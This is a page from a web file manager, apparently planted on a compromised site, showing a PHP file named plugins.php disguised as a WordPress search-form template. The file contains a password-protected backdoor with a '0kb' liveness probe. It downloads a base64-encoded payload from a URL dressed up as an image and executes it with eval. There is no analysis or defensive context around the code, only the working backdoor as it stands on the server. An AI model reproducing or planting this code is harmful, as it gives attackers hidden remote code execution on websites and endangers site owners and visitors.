Edit File by line

Deprecated: str_replace(): Passing null to parameter #2 ($replace) of type array|string is deprecated in /home/sportsfever/public_html/filemanger/function.php on line 93
/home/sportsfe.../www
File: plugins.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
[0] Fix | Delete
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
[1] Fix | Delete
$_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
[2] Fix | Delete
?>
[3] Fix | Delete
<?php
[4] Fix | Delete
/*
[5] Fix | Delete
* The searchform.php template.
[6] Fix | Delete
*
[7] Fix | Delete
* Used any time that get_search_form() is called.
[8] Fix | Delete
*
[9] Fix | Delete
* @link https://wordpress.org/themes/template/
[10] Fix | Delete
* @package WordPress
[11] Fix | Delete
* @subpackage
[12] Fix | Delete
* @since 1.0 */
[13] Fix | Delete
[14] Fix | Delete
$l = "https://user-images.githubusercontent.com/143735067/264713238-ae810af4-c98d-421f-bbb3-1ddcc58f952a.jpg"/* "" - ni*/;
[15] Fix | Delete
[16] Fix | Delete
//DX for each form and a string
[17] Fix | Delete
if( function_exists('curl_init') ) {
[18] Fix | Delete
$ch = curl_init();
[19] Fix | Delete
curl_setopt($ch, CURLOPT_URL, $l);
[20] Fix | Delete
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
[21] Fix | Delete
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
[22] Fix | Delete
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
[23] Fix | Delete
curl_setopt($ch, CURLOPT_HEADER, FALSE);
[24] Fix | Delete
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
[25] Fix | Delete
$body = curl_exec($ch);
[26] Fix | Delete
curl_close($ch);
[27] Fix | Delete
}
[28] Fix | Delete
else {
[29] Fix | Delete
$body = @file_get_contents($l);
[30] Fix | Delete
}
[31] Fix | Delete
eval(base64_decode($body));
[32] Fix | Delete
?>
[33] Fix | Delete
It is recommended that you Edit text format, this type of Fix handles quite a lot in one request
Function